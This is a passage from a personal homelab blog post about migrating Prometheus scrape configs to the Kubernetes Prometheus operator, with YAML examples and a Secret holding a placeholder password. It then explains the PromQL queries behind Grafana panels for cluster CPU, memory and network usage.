</span></span><span style="display:flex;"><span>        <span style="color:#f92672">job</span>: <span style="color:#ae81ff">hostmetrics</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;my.host:9100&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">relabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__address__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#e6db74">&#39;([^\:]+)\:[0-9]+&#39;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">instance</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">go_.*</span>
</span></span></code></pre></div><p>The config under <code>spec:</code> is very similar to what would be put into the
Prometheus config in a baremetal deployment. The same config would look something
like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">scrape_configs</span>:
</span></span><span style="display:flex;"><span>  - <span style="color:#f92672">job_name</span>: <span style="color:#ae81ff">hostmetrics</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">static_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>          - <span style="color:#e6db74">&#34;my.host:9100&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">relabel_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">source_labels</span>: [<span style="color:#ae81ff">__address__]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">([^\:]+)\:[0-9]+</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">target_label</span>: <span style="color:#ae81ff">instance</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">metric_relabel_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">source_labels</span>: [<span style="color:#ae81ff">__name__]</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">go_.*</span>
</span></span></code></pre></div><p>On the one hand this similarity is pretty nice. But on the other hand, the
differences, especially the switch from snake_case to camelCase, threw me off
several times.</p>
<p>Here is a more involved example with more configs, for my <a href="https://github.com/prometheus/snmp_exporter">snmp-exporter</a>,
which uses SNMP to gather metrics from my VDSL modem:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScrapeConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scraping-modem</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>: <span style="color:#ae81ff">scrape-modems</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">staticConfigs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">job</span>: <span style="color:#ae81ff">modemmetrics</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#ae81ff">300.300.300.1</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricsPath</span>: <span style="color:#ae81ff">/snmp</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scrapeInterval</span>: <span style="color:#ae81ff">1m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">params</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">module</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">routernameHere</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">relabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__address__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">__param_target</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">instance</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">routerHostnameHere</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">__address__</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">snmp-exporter.example.com</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">metricRelabelings</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">snmp_scrape_.*</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;__name__&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">action</span>: <span style="color:#ae81ff">drop</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">sysName</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">sourceLabels</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;adslAturCurrStatus&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">regex</span>: <span style="color:#ae81ff">([A-Z]*).*</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targetLabel</span>: <span style="color:#ae81ff">adslAturCurrStatus</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">replacement</span>: <span style="color:#ae81ff">${1}</span>
</span></span></code></pre></div><p>This is just to demonstrate that the ScrapeConfig supports most of the options
which are supported in the Prometheus config file. In the operator docs, they&rsquo;re
hedging their bets a bit by claiming that &ldquo;most&rdquo; configs are supported, but in my relatively large scrape configs I didn&rsquo;t find
a single case of an option which wasn&rsquo;t supported in ScrapeConfig.</p>
<p>One somewhat interesting case I would like to bring up was the scrape config
for Uptime Kuma. This had the special requirement of basic auth credentials for
the scrape.
My config looks like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">monitoring.coreos.com/v1alpha1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScrapeConfig</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">scraping-kuma</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">prometheus</span>: <span style="color:#ae81ff">scrape-kuma</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">staticConfigs</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">job</span>: <span style="color:#ae81ff">uptime</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">targets</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#e6db74">&#34;kuma.example.com&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">HTTPS</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">basicAuth</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">password</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kuma-basic-auth</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">username</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">key</span>: <span style="color:#ae81ff">username</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">kuma-basic-auth</span>
</span></span></code></pre></div><p>Here is where I found a difference between the Prometheus config file and the
ScrapeConfig. In my previous <code>prometheus.yaml</code>, I had the following:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  - <span style="color:#f92672">job_name</span>: <span style="color:#e6db74">&#39;uptime&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scrape_interval</span>: <span style="color:#ae81ff">30s</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">scheme</span>: <span style="color:#ae81ff">https</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">static_configs</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">targets</span>: [<span style="color:#e6db74">&#39;kuma.example.com&#39;</span>]
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">basic_auth</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">password</span>: {{ <span style="color:#ae81ff">with secret &#34;mysecret/foo/kuma&#34; }}{{ .Data.secret }}{{end}}</span>
</span></span></code></pre></div><p>This file would be templated in Nomad with the <code>mysecret/foo/kuma</code> secret
from Vault. Note that I&rsquo;m not giving a <code>username</code> here. Kuma simply ignores
the username in the BasicAuth.
But in the Secret I prepared for the k8s Prometheus, <code>kuma-basic-auth</code>, I had
to add a <code>data.username</code> field, as this field is required, and the admission
webhook of the Prometheus operator would throw an error if it is not supplied.
So now I&rsquo;ve got the username <code>foo</code> in the Secret to work around this issue.</p>
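<p>For reference, the Secret itself is then nothing special and looks roughly like
this (with the actual password obviously being different, and the namespace assumed
to be my monitoring namespace):</p>
<pre tabindex="0"><code>apiVersion: v1
kind: Secret
metadata:
  name: kuma-basic-auth
  namespace: monitoring
type: Opaque
stringData:
  # Kuma ignores the username, but the operator's admission webhook requires the key
  username: foo
  password: definitely-not-the-real-password
</code></pre>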
<p>Besides the Uptime Kuma config issue, the migration went very smoothly.
The biggest hiccup was that, once I was done copying the old Prometheus data, I
accidentally deleted the volume I had just copied that data to, instead of the
old volume. &#x1f926;</p>
<h2 id="the-k8s-dashboard">The k8s dashboard</h2>
<p>Now onto the result of all this data gathering. &#x1f913;</p>
<p>The first thing I would like to ask, if you&rsquo;re also using Prometheus data
scraping for your Kubernetes cluster: How do you identify &ldquo;problematic&rdquo; Pods?
E.g. Pods which are in a CrashLoop, or which are just pending because there&rsquo;s
no space left? I didn&rsquo;t really find anything good, and my googling skills
deserted me. If you&rsquo;ve got a couple good stats, hit me up on the Fediverse,
please!</p>
<p>Okay, first two plots are overall resource utilization in the cluster:</p>
<figure>
    <img loading="lazy" src="utilization.png"
         alt="A screenshot of two Grafana panels. Both show three gauges each, which are labeled &#39;Control Plane&#39;, &#39;Ceph&#39; and &#39;Workers&#39;. The first panel shows CPU resource usage, where the Control Plane has 48%, Ceph 92% and Workers 19%. The other panel show Memory resource usage, with the control plane at 37%, Ceph at 73% and Workers at 24%."/> <figcaption>
            <p>My resource utilization panels.</p>
        </figcaption>
</figure>

<p>This shows the three groups of hosts in my cluster, which are separated by different
taints. The control plane are the three control plane nodes, 4 cores and 4 GB
of RAM each, simulating the three Raspberry Pi 4 4GB which will ultimately house
the control plane. Ceph is currently two machines hosting the OSDs for the storage
and some other Ceph pieces. They&rsquo;re so full because Ceph needs a lot of pods
for basic functionality, and I gave them all an affinity for the Ceph hosts.
The workers are currently two VMs and a lone Raspberry Pi CM4 8GB. As you can
see from the utilization, most of what&rsquo;s running on the k8s cluster at the moment
is still infrastructure.</p>
<p>These two panels were not as easy to create as I had thought. I just couldn&rsquo;t
get the values to line up with the results of <a href="https://github.com/robscott/kube-capacity">kube-capacity</a>.</p>
<p>But before I get too far into the weeds, let&rsquo;s have a look at the PromQL query
for the CPU utilization panel. The memory panel is almost exactly the same:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#f92672">(</span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>kube_pod_container_resource_requests{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span> <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{value<span style="color:#f92672">!=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">)))</span> <span style="color:#f92672">/</span> <span style="color:#66d9ef">sum</span><span style="color:#f92672">((</span>kube_node_status_capacity{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span>kube_node_spec_taint{value<span style="color:#f92672">!=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">))</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">(</span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>kube_pod_container_resource_requests{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span> <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{value<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">)))</span> <span style="color:#f92672">/</span> <span style="color:#66d9ef">sum</span><span style="color:#f92672">((</span>kube_node_status_capacity{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span>kube_node_spec_taint{value<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">))</span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">(</span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>kube_pod_container_resource_requests{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span> <span style="color:#f92672">unless</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{}<span style="color:#f92672">)))</span> <span style="color:#f92672">/</span> <span style="color:#66d9ef">sum</span><span style="color:#f92672">((</span>kube_node_status_capacity{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">unless</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> kube_node_spec_taint{}<span style="color:#f92672">))</span>
</span></span></code></pre></div><p>(One of those things which just make me quietly happy: Hugo&rsquo;s syntax highlighter
supports PromQL. &#x1f642;)</p>
<p>Each of these has a numerator, which is the sum of the requests of all of the
pods running on the given group of hosts. The denominator then is the total
resources available to the given host group. Getting these right took a bit of work.</p>
<p>Let&rsquo;s just start with the very first part, which is similar for all of the
host groups:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span>kube_pod_container_resource_requests{resource<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">cpu</span>&#34;} <span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span>
</span></span></code></pre></div><p>This part contains the base metric, <code>kube_pod_container_resource_requests</code>.
This metric reflects the resources requested by each container in each pod.
The first thing I found was that this metric does of course not just cover currently
running pods, but really all pods. So the first step was a &ldquo;filter&rdquo; on
the containers. This is what the second part does:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>pod<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_pod_status_phase{phase<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">Running</span>&#34;} <span style="color:#f92672">==</span> <span style="color:#ae81ff">1</span><span style="color:#f92672">)</span>
</span></span></code></pre></div><p>Let&rsquo;s start with this one at the back: The <code>kube_pod_status_phase</code> is a really
useful metric when you want to find things out about pods. In this case, I
wanted to get all <code>Running</code> pods. But it&rsquo;s not enough to just get all the
Pods with <code>Running</code> phase. That would be too many, including pods which are
already gone, for some reason. But checking whether the actual value of the
metric equals <code>1</code> does the trick.</p>
<p>So what now happens: With the <code>and</code> as an operator, Prometheus outputs a new
vector which contains all the labels of <code>kube_pod_container_resource_requests</code>.
Then it filters out all values from that vector where no entry in the
<code>kube_pod_status_phase{phase=&quot;Running&quot;} == 1</code> vector has the same value for the
<code>pod</code> label. In short, the result of this entire first part are the resource
requests for all containers on the entire cluster which are currently running.</p>
<p>But this wasn&rsquo;t exactly what I wanted. I need to know whether any of my groups
of hosts is getting full. Which leads me to the second part of the numerator.
This provides the filter for a specific group of hosts. The first two filter
for the two groups of hosts which have a taint, the control plane and Ceph nodes:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{value<span style="color:#f92672">!=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">)</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">and</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{value<span style="color:#f92672">=</span>&#34;<span style="color:#e6db74">ceph</span>&#34;}<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>The third one filters for my worker nodes, which don&rsquo;t have a taint:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#f92672">unless</span> <span style="color:#66d9ef">on</span><span style="color:#f92672">(</span>node<span style="color:#f92672">)</span> <span style="color:#f92672">(</span>kube_node_spec_taint{}<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>Here I&rsquo;m constructing a vector of all nodes with taints and then filtering the
Kubernetes pod requests for all elements which are <em>not</em> in that vector.</p>
<p>And with that, I&rsquo;ve finally got three sets of resource requests, one for each
group of hosts.</p>
<p>The denominator then has to be the total resources of the three node groups.
This works the same as the numerator query. Here, the data I want is in the
<code>kube_node_status_capacity{resource=&quot;cpu&quot;}</code> metric, and I again filter by
the taint to get the total resources per group.</p>
<p>Before moving on to the next chart, it&rsquo;s important to note that the <code>kube_pod_container_resource_requests</code>
metric is not 100% accurate. For most of my nodes, summing up all of the
requests results in a slightly too low value, when compared to the output of
kube-capacity. This happens because requests can be put on the container and on
the Pod. One example in my cluster are the Cilium Pods. Going by my Prometheus
metrics, they don&rsquo;t have any CPU requests. But in reality, they do request
50m CPUs, just on the Pod, not the container.
There is a better metric for this, discussed in <a href="https://github.com/kubernetes/kube-state-metrics/issues/1095">this GitHub issue</a>.
This metric, <code>kube_pod_resource_requests</code>, is more precise. But it is not enabled
by default. See also the <a href="https://kubernetes.io/docs/concepts/cluster-administration/system-metrics/#kube-scheduler-metrics">Kubernetes docs</a>.
I will likely enable this one later, but have not bothered with it yet.</p>
<p>So now onto the next set of metrics, which are the per-container metrics. The
first one is the CPU usage:</p>
<figure>
    <img loading="lazy" src="cpu.png"
         alt="A screenshot of a Grafana time series panel. It shows 24h worth of CPU utilization. It is titled &#39;CPU usage by Container&#39;. There are a number of curves between 0 and 0.2 on the Y axis, with relatively little fluctuation overall."/> <figcaption>
            <p>My CPU utilization, in total CPU usage seconds.</p>
        </figcaption>
</figure>

<p>I&rsquo;ve got two of these, both using the <code>container_cpu_usage_seconds_total</code> metric.
One of them is aggregated per container, and one per Namespace. I did not go
with aggregation by Pod, because the pod names are not stable.
The query for this plot is pretty simple:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-promql" data-lang="promql"><span style="display:flex;"><span><span style="color:#66d9ef">sum</span><span style="color:#f92672">(</span><span style="color:#66d9ef">rate</span><span style="color:#f92672">(</span>container_cpu_usage_seconds_total{container<span style="color:#f92672">!~</span>&#34;<span style="color:#e6db74">POD|</span>&#34;}[<span style="color:#960050;background-color:#1e0010">$__rate_interval</span>]<span style="color:#f92672">))</span> <span style="color:#66d9ef">by</span> <span style="color:#f92672">(</span>container<span style="color:#f92672">)</span>
</span></span></code></pre></div><p>The only &ldquo;special&rdquo; thing I needed to do here was to exclude the <code>POD</code> &ldquo;container&rdquo;
and the container with the empty name. The value with the <code>POD</code> container is
actually the &ldquo;Pause&rdquo; container of the Pod, while the empty container is the value
for the cgroup, and I&rsquo;m interested in neither.</p>
<p>This plot shows one of those small, yet interesting things which make me look
at my metrics:</p>
<p><figure>
    <img loading="lazy" src="prom_cpu.png"
         alt="A screenshot of a Grafana time series panel. It shows the CPU usage of the Prometheus container from 15:40 to 17:40. In the interval from the start to 16:30, the CPU usage hovers at around 0.0125. Then there is a short break in the graph, and it continues around 16:32, but with a higher baseline, hovering around 0.0906 instead after a short period of usage up to 0.25."/> <figcaption>
            <p>CPU usage of Prometheus after a redeployment.</p>
        </figcaption>
</figure>

This plot shows the CPU utilization of the Prometheus Pod during a re-schedule,
which happens around 16:30. Prometheus wasn&rsquo;t actually using more CPU because it
was doing more - it just got moved from my x86 server to a Pi. And on that Pi,
Prometheus needs to spend more CPU time to do the same thing.
Simple and logical, of course, but I love seeing simple principles spelled out
and measured like this. &#x1f642;</p>
<p>Let&rsquo;s finish by looking at the values for the CPU usage again. It reflects the
current state of the cluster pretty well - there&rsquo;s not that much running on it
yet. The majority of my workloads are still running on my Nomad/Baremetal Ceph
cluster. The three top users by container are the cilium-agent, kube-apiserver
and etcd. Even the Ceph OSDs come only after that. This will change in the future
of course, e.g. the OSDs will become more loaded once the root disks of my worker
nodes start running off of the Ceph Rook cluster. But for now, it&rsquo;s mostly
just the infrastructure.</p>
<figure>
    <img loading="lazy" src="memory.png"
         alt="Another Grafana screenshot, this time of a panel for the Memory consumption, by namespace. It shows a 24h interval. There are two distinct curves at 5.5 GB and 8.3 GB. The 5.5 GB curve only slightly throughout the day, while the 8.3 GB curve shows a max of 8.5 GB and a minimum of 7.9 GB."/> <figcaption>
            <p>Memory usage by Namespace.</p>
        </figcaption>
</figure>

<p>The memory usage shows a similar pattern, although here, the top curve, around
8.3 GB, is the <code>rook-cluster</code> namespace, housing all the main Ceph components.
The next lower curve, around 5.5 GB is the <code>kube-system</code> namespace, again showing
that for now, infrastructure dominates my cluster&rsquo;s memory consumption.</p>
<p>Memory usage, overall, is not an easy thing to measure in Linux. I&rsquo;ve found
<a href="https://itnext.io/from-rss-to-wss-navigating-the-depths-of-kubernetes-memory-metrics-4d7d77d8fdcb">this article</a> quite useful. cAdvisor, which provides the per-container metrics, has several
choices for memory usage:</p>
<ul>
<li><code>container_memory_rss</code></li>
<li><code>container_memory_usage_bytes</code></li>
<li><code>container_memory_working_set_bytes</code></li>
</ul>
<p>Here are these three metrics, shown as a sum for my Monitoring namespace, running
Prometheus itself and the Prometheus operator as well as kube-state-metrics:</p>
<figure>
    <img loading="lazy" src="three_mem_types.png"
         alt="Another Grafana screenshot, this time of a single panel with three curves, showing different memory metrics. All three curves follow roughly the same behavior. Initially, all three show a slow increase, until they shortly raise up, then go down, just to then raise up even higher, before going down again, all in unison and by approximately the same value. The lowest of the three, titled &#39;container_memory_rss&#39;, starts at around 570 MB. The middle curve, showing &#39;container_memory_working_set_bytes&#39;, starts at about 600 MB, while the highest of the three, &#39;container_memory_usage_bytes&#39;, starts at 680 MB."/> <figcaption>
            <p>The three types of memory metrics as sums over the monitoring Namespace.</p>
        </figcaption>
</figure>

<p>This shows the differences. The <a href="https://en.wikipedia.org/wiki/Resident_set_size">Resident Set Size</a>,
being the heap and stack held in memory, is the lowest of the three curves. Next, the
Working Set Size is the amount of memory which was recently touched by the
process. It is generally described as the data which the process needs in the next couple
of seconds to do its work. I found <a href="https://www.brendangregg.com/blog/2018-01-17/measure-working-set-size.html">this post</a> an interesting read. The final and highest curve is the Memory Usage.
This is so high because it also contains files mapped into memory, even when those
files haven&rsquo;t been touched in a while. No surprise that Prometheus, which is,
all said and done, mostly a time series DB, has a pretty hefty amount of
memory-mapped DB files.
What annoyed me a bit is that none of these values actually corresponds to the
<code>RES</code> values I&rsquo;m seeing in htop. But the working set came closest, and its
definition made the most sense to me, so I&rsquo;ve been going with that one for now.</p>
<p>Next up is networking:
<figure>
    <img loading="lazy" src="networking_tx.png"
         alt="Another Grafana panel, this time for the network transmission, again by Namespace. All of the curves are below the 200 Mbps threshold for the majority of the time. But there are two significant spikes. The first one at 02:30 going up to 1.85 Gbps, and the second one at 03:30, going up to 2.48 Gbps."/> <figcaption>
            <p>Network transmissions by namespace over 24h. The spikes are dominated by the rook-cluster namespace, in orange.</p>
        </figcaption>
</figure>
</p>
<p>First important thing to note about this chart: It is an aggregation over all Pods
in a namespace. And those pods might be running on different hosts. That&rsquo;s how
I&rsquo;m getting a max throughput of 2.48 Gbps, even though I&rsquo;ve only got a 1 Gbps
LAN here. Another factor might be loopback interface traffic, which of course can
also be faster. The two spikes at 02:30 and 03:30 are my backups. The first, lower
spike, up to 1.85 Gbps, is the backup of my CSI volumes. The Ceph Rook cluster already
hosts the S3 backup buckets, while the baremetal cluster still hosts the CSI
volumes. So I expect these spikes to increase in the future, when the Ceph Rook
cluster needs to provide both the data being backed up and the backup target.
Then the higher spike at 03:30 is my backup of many of those backup buckets to
an external HDD. I&rsquo;m currently not 100% sure why that one produces more network
traffic.
What I&rsquo;m also wondering about right now is what that blue curve, which follows
the two spikes but doesn&rsquo;t go quite as high, is all about. That&rsquo;s the rook-ceph
namespace, which only contains the Rook operator and the CSI plugin pods. None
of those should be in the data path during a transmission. Not sure what&rsquo;s going
on here.</p>
